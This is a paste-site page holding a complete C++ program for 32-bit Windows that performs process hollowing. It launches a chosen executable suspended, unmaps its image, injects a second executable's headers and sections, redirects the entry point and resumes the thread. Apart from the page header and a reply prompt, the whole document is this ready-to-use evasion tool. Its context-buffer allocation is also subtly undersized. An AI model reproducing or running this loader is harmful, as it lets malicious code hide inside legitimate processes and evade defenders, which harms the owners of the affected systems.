in-memory execution

From RubberDuck, 5 Years ago, written in C++, viewed 521 times.
URL http://paste.security-portal.cz/view/0d5d6e10 Embed
Download Paste or View Raw
  1. /*
  2.  * Author: RubberDuck
  3.  * Webpage: https://bflow.security-portal.cz/spousteni-binarky-z-pameti-bez-nutnosti-ulozeni-na-disk/
  4.  */
  5. #include <Windows.h>
  6. #include <stdio.h>
  7.  
  8. typedef LONG (WINAPI * NtUnmapViewOfSection)(HANDLE ProcessHandle, PVOID BaseAddress);
  9.  
  10. int main(int argc, char *argv[]){
  11.   HANDLE hFile = NULL;
  12.   DWORD dwRead = 0, dwSize = 0, dwImageBase = 0, i = 0;
  13.   LPVOID pBuffer = NULL, pImageBase = NULL;
  14.   TCHAR szFilePath[1024];
  15.   PIMAGE_DOS_HEADER piDOSh = NULL;
  16.   PIMAGE_NT_HEADERS piNTh = NULL;
  17.   PIMAGE_FILE_HEADER piFileh = NULL;
  18.   PIMAGE_OPTIONAL_HEADER piOptionalh = NULL;
  19.   PIMAGE_SECTION_HEADER piSectionh = NULL;
  20.   PROCESS_INFORMATION pi;
  21.   STARTUPINFOA si;
  22.   PCONTEXT pContext;
  23.   NtUnmapViewOfSection funcNtUnmapViewOfSection;
  24.  
  25.   if(argc < 3){
  26.     printf("Usage: %s <path>/<original.exe> <path>/<replace.exe>\n", argv[0]);
  27.     return 0;
  28.   }
  29.  
  30.   ZeroMemory(&si, sizeof(si));
  31.   ZeroMemory(&pi, sizeof(pi));
  32.  
  33.   hFile = CreateFileA(argv[2],
  34.             GENERIC_READ,
  35.             FILE_SHARE_READ,
  36.             NULL, OPEN_EXISTING,
  37.             NULL, NULL);
  38.  
  39.   if(hFile != INVALID_HANDLE_VALUE){
  40.     printf("[+] File %s opened\n", argv[2]);
  41.     dwSize = GetFileSize(hFile, NULL);
  42.     printf("[+] Filesize is %i bytes\n", dwSize);
  43.  
  44.     pBuffer = VirtualAlloc(NULL, dwSize, MEM_COMMIT, PAGE_READWRITE);
  45.     if(pBuffer != NULL){
  46.       ReadFile(hFile, pBuffer, dwSize, &dwRead, NULL);
  47.       printf("[+] Write file to memory address %p\n", pBuffer);
  48.       piDOSh = (PIMAGE_DOS_HEADER) pBuffer;
  49.  
  50.       if(piDOSh->e_magic == IMAGE_DOS_SIGNATURE){
  51.         piNTh = (PIMAGE_NT_HEADERS)((DWORD)pBuffer + piDOSh->e_lfanew);
  52.         printf("[+] DOS signature detected\n");
  53.  
  54.         if(piNTh->Signature == IMAGE_NT_SIGNATURE){
  55.           printf("[+] PE signature detected\n");
  56.           piOptionalh = (PIMAGE_OPTIONAL_HEADER)&(piNTh->OptionalHeader);
  57.           piFileh = (PIMAGE_FILE_HEADER)&(piNTh->FileHeader);
  58.  
  59.           if(CreateProcessA(argv[1], NULL, NULL, NULL,
  60.                             FALSE, CREATE_SUSPENDED,
  61.                             NULL, NULL, &si, &pi)){
  62.  
  63.             printf("[+] New process %s created\n", argv[1]);
  64.  
  65.             pContext = (PCONTEXT) VirtualAlloc(NULL, sizeof(pContext),
  66.                                                MEM_COMMIT, PAGE_READWRITE);
  67.             pContext->ContextFlags = CONTEXT_FULL;
  68.  
  69.             if(GetThreadContext(pi.hThread, pContext)){
  70.               printf("[+] Context obtained\n");
  71.               ReadProcessMemory(pi.hProcess,
  72.                                 (LPCVOID)(pContext->Ebx + 8),
  73.                                 &dwImageBase, 4, NULL);
  74.  
  75.               printf("[+] Current ImageBase is on address 0x%.8x\n", dwImageBase);
  76.  
  77.               funcNtUnmapViewOfSection = NtUnmapViewOfSection(GetProcAddress(GetModuleHandleA("ntdll.dll"),
  78.                                                               "NtUnmapViewOfSection"));
  79.               funcNtUnmapViewOfSection(pi.hProcess, (PVOID)dwImageBase);
  80.  
  81.               printf("[+] Image unmapped\n");
  82.  
  83.               pImageBase = (LPVOID)VirtualAllocEx(pi.hProcess, (PVOID)piOptionalh->ImageBase,
  84.                                                   piOptionalh->SizeOfImage,
  85.                                                                                                   MEM_COMMIT | MEM_RESERVE,
  86.                                                   PAGE_EXECUTE_READWRITE);
  87.               if(pImageBase != NULL){
  88.                 WriteProcessMemory(pi.hProcess, pImageBase,
  89.                                    pBuffer,
  90.                                                                    piOptionalh->SizeOfHeaders,
  91.                                    NULL);
  92.  
  93.                 printf("[+] File headers are written\n");
  94.  
  95.                 for(i = 0; i < piFileh->NumberOfSections; i++){
  96.                   piSectionh = (PIMAGE_SECTION_HEADER)((DWORD)pBuffer + piDOSh->e_lfanew +
  97.                                                        sizeof(IMAGE_NT_HEADERS) +
  98.                                                        i * sizeof(IMAGE_SECTION_HEADER));
  99.                   WriteProcessMemory(pi.hProcess, (LPVOID)((DWORD)pImageBase + piSectionh->VirtualAddress),
  100.                                      (LPVOID)((DWORD)pBuffer + piSectionh->PointerToRawData),
  101.                                      piSectionh->SizeOfRawData, NULL);
  102.                   printf("[+] Section %s is written\n", piSectionh->Name);
  103.                 }
  104.  
  105.                 WriteProcessMemory(pi.hProcess, (LPVOID)(pContext->Ebx + 8),
  106.                                    &(piOptionalh->ImageBase), 4, NULL);
  107.  
  108.                   printf("[+] New ImageBase is 0x%.8x\n", piOptionalh->ImageBase);
  109.  
  110.                 pContext->Eax = (DWORD)pImageBase + piOptionalh->AddressOfEntryPoint;
  111.  
  112.                 SetThreadContext(pi.hThread, pContext);
  113.                 printf("[+] Re-set thred context\n");
  114.                 ResumeThread(pi.hThread);
  115.                 printf("[+] Thred resumed\n", argv[2]);
  116.               }
  117.             }
  118.           }
  119.         }
  120.       }
  121.  
  122.       VirtualFree(pBuffer, 0, MEM_RELEASE);
  123.     }
  124.  
  125.     CloseHandle(hFile);
  126.   }
  127.  
  128.   getchar();
  129.  
  130.   return 0;
  131. }

Reply to "in-memory execution"

Here you can reply to the paste above